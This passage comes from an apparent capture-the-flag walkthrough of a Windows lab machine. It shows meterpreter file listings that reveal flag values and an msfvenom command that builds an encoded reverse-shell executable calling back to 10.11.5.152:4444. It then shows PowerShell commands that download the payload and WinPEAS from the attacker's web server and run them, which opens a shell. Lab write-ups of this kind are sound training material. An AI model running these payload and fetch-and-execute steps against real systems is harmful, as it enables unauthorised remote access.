100666/rw-rw-rw-  65536   fil   2019-08-04 20:57:22 +0200  NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM.blf
100666/rw-rw-rw-  524288  fil   2019-08-04 20:57:22 +0200  NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2019-08-04 20:57:22 +0200  NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  NetHood
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Pictures
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  PrintHood
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  Recent
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Saved Games
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Searches
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  SendTo
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  Start Menu
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  Templates
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Videos
100666/rw-rw-rw-  274432  fil   2019-08-04 20:54:52 +0200  ntuser.dat.LOG1
100666/rw-rw-rw-  98304   fil   2019-08-04 20:54:52 +0200  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2019-08-04 20:54:52 +0200  ntuser.ini

meterpreter > cd "C:\\Users\\jeff\\Desktop"
meterpreter > ls
Listing: C:\Users\jeff\Desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-08-04 20:54:53 +0200  desktop.ini
100666/rw-rw-rw-  32    fil   2019-08-04 20:57:10 +0200  user.txt

meterpreter > cat user.txt
759bd8af507517bcfaede78a21a73e39
meterpreter > cd "C:\\Users\\Administrator\\Desktop"
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  1029  fil   2019-08-04 13:36:42 +0200  System Scheduler.lnk
100666/rw-rw-rw-  282   fil   2019-08-03 19:43:54 +0200  desktop.ini
100666/rw-rw-rw-  32    fil   2019-08-04 20:51:42 +0200  root.txt

meterpreter > cat root.txt 
7e13d97f05f7ceb9881a3eb3d78d3e72
```


## Privilege Escalation Without Metasploit
In this part generate a more stable shell using msfvenom, instead of using a meterpreter. This time let's set our payload to `windows/shell_reverse_tcp`
```bash
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.5.152 LPORT=4444 -f exe -o meterpreter3.exe 
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: meterpreter3.exe
```

Now we create a listener with the appropriated parameters:
```bash
msf6 exploit(multi/handler) > set LPORT 4444 
LPORT => 4444
msf6 exploit(multi/handler) > set payload windows/shell_reverse_tcp 
payload => windows/shell_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.11.5.152:4444 
```

Then, we download the reverse-shell by create a simple http server with `python3 -m http.server 80` and we execute it:
```powershell
c:\windows\system32\inetsrv>
cd C:\Windows\Temp
c:\windows\system32\inetsrv>cd C:\Windows\Temp
powershell -c wget "http://10.11.5.152/meterpreter3.exe" -outfile "meterpreter3.exe"
C:\Windows\Temp>powershell -c wget "http://10.11.5.152/meterpreter3.exe" -outfile "meterpreter3.exe"

C:\Windows\Temp>
dir
C:\Windows\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552
 Directory of C:\Windows\Temp
10/25/2022  01:46 AM    <DIR>          .
10/25/2022  01:46 AM    <DIR>          ..
10/25/2022  12:48 AM            73,802 (x86)SystemSchedulerMessage.exe
08/06/2019  02:13 PM             8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019  02:13 PM           181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019  02:13 PM             1,206 cleanup.txt
08/06/2019  02:13 PM               421 cmdout
08/06/2019  02:11 PM                 0 DMI2EBC.tmp
08/03/2019  10:43 AM                 0 DMI4D21.tmp
08/06/2019  02:12 PM             8,743 EC2ConfigService_20190806141221.log
08/06/2019  02:12 PM           292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
10/25/2022  12:35 AM            73,802 meterpreter.exe
10/25/2022  12:47 AM            73,802 meterpreter2.exe
10/25/2022  01:46 AM            73,802 meterpreter3.exe
10/25/2022  12:35 AM    <DIR>          Microsoft
08/06/2019  02:13 PM                21 stage1-complete.txt
08/06/2019  02:13 PM            28,495 stage1.txt
05/12/2019  09:03 PM           113,328 svcexec.exe
08/06/2019  02:13 PM                67 tmp.dat
10/25/2022  12:35 AM         1,833,472 WinPEAS.exe
              17 File(s)      2,763,662 bytes
               3 Dir(s)  39,124,553,728 bytes free
meterpreter3.exe
```

Now that we have a shell, let's download WinPEAS on the target:
```powershell
[*] Command shell session 4 opened (10.11.5.152:4444 -> 10.10.33.59:49353) at 2022-10-25 10:46:57 +0200


Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
          

C:\Windows\Temp>powershell -c wget "http://10.11.5.152/WinPEAS.exe" -outfile "WinPEAS.exe"
powershell -c wget "http://10.11.5.152/WinPEAS.exe" -outfile "WinPEAS.exe"

C:\Windows\Temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552

 Directory of C:\Windows\Temp

10/25/2022  01:46 AM    <DIR>          .
10/25/2022  01:46 AM    <DIR>          ..
10/25/2022  12:48 AM            73,802 (x86)SystemSchedulerMessage.exe
08/06/2019  02:13 PM             8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019  02:13 PM           181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019  02:13 PM             1,206 cleanup.txt
08/06/2019  02:13 PM               421 cmdout
08/06/2019  02:11 PM                 0 DMI2EBC.tmp
08/03/2019  10:43 AM                 0 DMI4D21.tmp
08/06/2019  02:12 PM             8,743 EC2ConfigService_20190806141221.log
08/06/2019  02:12 PM           292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
10/25/2022  12:35 AM            73,802 meterpreter.exe
10/25/2022  12:47 AM            73,802 meterpreter2.exe
10/25/2022  01:46 AM            73,802 meterpreter3.exe
10/25/2022  12:35 AM    <DIR>          Microsoft
08/06/2019  02:13 PM                21 stage1-complete.txt
08/06/2019  02:13 PM            28,495 stage1.txt
05/12/2019  09:03 PM           113,328 svcexec.exe
08/06/2019  02:13 PM                67 tmp.dat
10/25/2022  01:53 AM         1,833,472 WinPEAS.exe
              17 File(s)      2,763,662 bytes
               3 Dir(s)  39,124,529,152 bytes free

C:\Windows\Temp>
```

Finally, I could not find the original installation time with `WinPEAS` so I used:
```powershell
C:\Windows\Temp>systeminfo | findstr /i date                         
systeminfo | findstr /i date
Original Install Date:     8/3/2019, 10:43:23 AM 
```